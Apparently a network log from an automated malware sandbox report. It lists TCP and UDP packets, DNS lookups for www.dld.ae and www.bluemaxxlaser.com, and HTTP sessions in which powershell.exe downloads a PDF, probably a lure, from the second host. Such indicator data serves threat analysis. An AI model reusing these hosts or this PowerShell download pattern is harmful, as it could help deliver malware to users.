                                                      Jun 1, 2023 12:14:28.019979000 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020000935 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020029068 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020041943 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020059109 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020092964 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020107031 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020123005 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020150900 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020159006 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020180941 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020207882 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020220995 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020241022 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020277977 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020292044 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020320892 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020347118 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020356894 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020380020 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020411015 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020420074 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020464897 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020493984 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020509958 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020524025 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020556927 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020566940 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020584106 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020612001 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020626068 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020639896 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020668983 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020679951 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020698071 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020724058 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020735025 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.020751953 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020780087 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.020791054 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.075874090 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.142411947 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142474890 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142505884 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142534018 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142577887 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142585993 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.142607927 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142627954 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.142637014 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142654896 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.142672062 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142702103 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142710924 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.142734051 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142760992 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142774105 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.142790079 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142819881 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142827988 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.142849922 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142878056 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142889977 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.142908096 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142935038 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142944098 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.142965078 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.142995119 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143002987 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143026114 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143053055 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143063068 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143081903 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143112898 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143121958 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143142939 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143171072 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143181086 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143203974 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143233061 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143241882 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143263102 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143292904 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143301964 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143322945 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143352032 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143364906 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143381119 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143412113 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143420935 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143443108 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143471003 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143481970 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143500090 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143527985 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143546104 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143558025 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143588066 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143596888 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143616915 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143645048 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143656969 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143673897 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143704891 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143713951 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143735886 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143764019 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143774986 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143795967 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143825054 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143836975 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143856049 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143887043 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143894911 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143915892 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143944979 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.143954992 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.143973112 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144005060 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144015074 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144041061 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144072056 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144084930 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144104958 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144134998 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144145966 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144195080 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144224882 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144238949 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144253016 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144295931 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144298077 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144329071 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144356966 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144368887 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144385099 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144413948 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144431114 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144443035 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144474030 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144484997 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144503117 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144531012 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144552946 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144562006 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144593954 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144602060 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144628048 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144658089 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144669056 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144687891 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144718885 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144731045 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144750118 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144778013 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144787073 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144809008 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144839048 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144846916 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144870043 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144900084 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144912958 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144927979 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144958973 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.144968987 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.144988060 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145018101 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145026922 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145047903 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145076990 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145090103 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145107985 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145137072 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145144939 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145168066 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145195961 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145209074 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145224094 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145252943 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145262957 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145283937 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145314932 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145323992 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145344973 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145371914 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145382881 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145401955 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145430088 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145441055 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145462036 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145489931 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145503044 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145518064 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145543098 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145565033 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145571947 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145596981 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145612001 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145622969 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145648956 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145663023 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145678043 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145701885 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145720959 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145746946 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145759106 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145775080 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145803928 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145816088 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145832062 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145845890 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145860910 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145870924 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145889044 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145915985 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145927906 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145944118 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145972013 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.145987034 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.145999908 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.146023035 CEST8049718203.175.174.69192.168.2.5
                                                      Jun 1, 2023 12:14:28.146037102 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.168724060 CEST4971880192.168.2.5203.175.174.69
                                                      Jun 1, 2023 12:14:28.404694080 CEST4971880192.168.2.5203.175.174.69

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jun 1, 2023 12:14:23.440653086 CEST4972453192.168.2.58.8.8.8
                                                      Jun 1, 2023 12:14:23.476747990 CEST53497248.8.8.8192.168.2.5
                                                      Jun 1, 2023 12:14:23.483148098 CEST6145253192.168.2.58.8.8.8
                                                      Jun 1, 2023 12:14:23.512679100 CEST53614528.8.8.8192.168.2.5
                                                      Jun 1, 2023 12:14:26.558705091 CEST6532353192.168.2.58.8.8.8
                                                      Jun 1, 2023 12:14:26.617739916 CEST53653238.8.8.8192.168.2.5

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jun 1, 2023 12:14:23.440653086 CEST192.168.2.58.8.8.80xb49eStandard query (0)www.dld.aeA (IP address)IN (0x0001)false
                                                      Jun 1, 2023 12:14:23.483148098 CEST192.168.2.58.8.8.80xf23aStandard query (0)www.dld.aeA (IP address)IN (0x0001)false
                                                      Jun 1, 2023 12:14:26.558705091 CEST192.168.2.58.8.8.80x12deStandard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jun 1, 2023 12:14:23.476747990 CEST8.8.8.8192.168.2.50xb49eNo error (0)www.dld.aedld.aeCNAME (Canonical name)IN (0x0001)false
                                                      Jun 1, 2023 12:14:23.476747990 CEST8.8.8.8192.168.2.50xb49eNo error (0)dld.ae84.16.234.51A (IP address)IN (0x0001)false
                                                      Jun 1, 2023 12:14:23.512679100 CEST8.8.8.8192.168.2.50xf23aNo error (0)www.dld.aedld.aeCNAME (Canonical name)IN (0x0001)false
                                                      Jun 1, 2023 12:14:23.512679100 CEST8.8.8.8192.168.2.50xf23aNo error (0)dld.ae84.16.234.51A (IP address)IN (0x0001)false
                                                      Jun 1, 2023 12:14:26.617739916 CEST8.8.8.8192.168.2.50x12deNo error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.dld.ae
                                                      • www.bluemaxxlaser.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.54971784.16.234.51443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampkBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.549718203.175.174.6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jun 1, 2023 12:14:26.791034937 CEST441OUTGET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                      Host: www.bluemaxxlaser.com
                                                      Connection: Keep-Alive
                                                      Jun 1, 2023 12:14:26.959544897 CEST442INHTTP/1.1 200 OK
                                                      Date: Thu, 01 Jun 2023 10:14:26 GMT
                                                      Server: Apache
                                                      Last-Modified: Sun, 28 May 2023 21:58:29 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 653248
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/pdf
                                                      Data Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35 33 32 3e 5d 2f 49 6e 64 65 78 5b 31 32 39 20 33 38 5d 2f 49 6e 66 6f 20 31 32 38 20 30 20 52 2f 4c 65 6e 67 74 68 20 38 39 2f 50 72 65 76 20 36 35 32 37 37 31 2f 52 6f 6f 74 20 31 33 30 20 30 20 52 2f 53 69 7a 65 20 31 36 37 2f 54 79 70 65 2f 58 52 65 66 2f 57 5b 31 20 33 20 31 5d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 62 62 64 60 10 60 60 62 60 60 fe 04 22 19 3a 40 24 53 19 58 c4 06 44 1a 1d 05 8b 27 82 c8 6e 03 b0 6c 1b 88 64 ac 00 8b c7 02 49 46 77 66 b0 78 2d 88 d4 bb 02 24 ff 1f 34 66 60 02 9a 2c 08 56 c3 c0 38 00 e4 7f 06 c6 9c 37 40 f2 3f 3f 03 40 80 01 00 c4 3a 0e 4d 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 73 74 61 72 74 78 72 65 66 0d 0a 30 0d 0a 25 25 45 4f 46 0d 0a 20 20 20 20 20 20 20 0d 0a 31 36 35 20 30 20 6f 62 6a 0d 3c 3c 2f 43 20 31 38 30 2f 45 20 31 36 34 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 20 32 30 32 2f 4c 65 6e 67 74 68 20 31 36 37 2f 4f 20 31 32 36 2f 53 20 37 34 2f 56 20 31 34 32 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 62 60 60 60 61 60 60 aa 64 60 65 60 48 88 67 10 62 40 00 21 06 66 a0 1c 0b 03 87 8b 03 0b 83 75 76 03 03 67 e0 d2 75 8b 0e 28 3b a4 70 30 f0 1c 32 91 68 e4 e8 40 16 05 ea d0 62 e0 bc b6 1a 48 f3 00 31 2f d8 8c 58 06 01 46 49 a6 fb 86 19 0c 2c 5d 97 19 35 19 a5 19 18 dc 96 31 2a e8 96 0b fe 64 d2 06 ab d0 66 e0 bc 69 0c a4 19 81 a8 12 48 eb 30 70 de 5a 03 e1 33 dd 85 bb 45 9f 81 f3 c9 2f 88 28 43 21 10 eb 32 70 de ed 04 d2 4c 0c 0c ec 85 70 55 46 0c 9c 5f be 43 55 bd 01 08 30 00 be 98 22 2e 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 33 30 20 30 20 6f 62 6a 0d 3c 3c 2f 41 63 72 6f 46 6f 72 6d 20 31 34 34 20 30 20 52 2f 4d 65 74 61 64 61 74 61 20 34 38 20 30 20 52 2f 4e 61 6d 65 73 20 31 34 35 20 30 20 52 2f 4f 75 74 6c 69 6e 65 73 20 31 30 33 20 30 20 52 2f 50 61 67 65 73 20 31 32 37 20 30 20 52 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 31 31 37 20 30 20 52 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 3e 3e 0d 65 6e 64 6f 62 6a 0d 31 33 31 20 30 20 6f 62 6a 0d 3c 3c 2f 43 6f 6e 74 65 6e 74 73 20 31 33 32 20 30 20 52 2f 43 72 6f 70 42 6f 78 5b 30 20 30 20 35 39 35 2e 34 34 20 38 34 31 2e 36 38 5d 2f 47 72 6f 75 70 3c 3c 2f 43 53 2f 44 65 76 69 63 65 52 47 42 2f 53 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 2f 54 79 70 65 2f 47 72 6f 75 70 3e 3e 2f 4d 65 64 69 61 42 6f 78 5b 30 20 30 20 35 39 35 2e 34 34 20 38 34 31
                                                      Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>streamhbbd```b``":@$SXD'nldIFwfx-$4f`,V87@??@:Mendstreamendobjstartxref0%%EOF 165 0 obj<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>streamhb```a``d`e`Hgb@!fuvgu(;p02h@bH1/XFI,]51*dfiH0pZ3E/(C!2pLpUF_CU0".endstreamendobj130 0 obj<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>endobj131 0 obj<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/Type/Group>>/MediaBox[0 0 595.44 841
                                                      Jun 1, 2023 12:14:26.959605932 CEST443INData Raw: 2e 36 38 5d 2f 50 61 72 65 6e 74 20 31 32 37 20 30 20 52 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 45 78 74 47 53 74 61 74 65 3c 3c 2f 47 53 30 20 31 34 36 20 30 20 52 3e 3e 2f 46 6f 6e 74 3c 3c 2f 43 32 5f 30 20 31 35 31 20 30 20 52 2f 43 32 5f 31
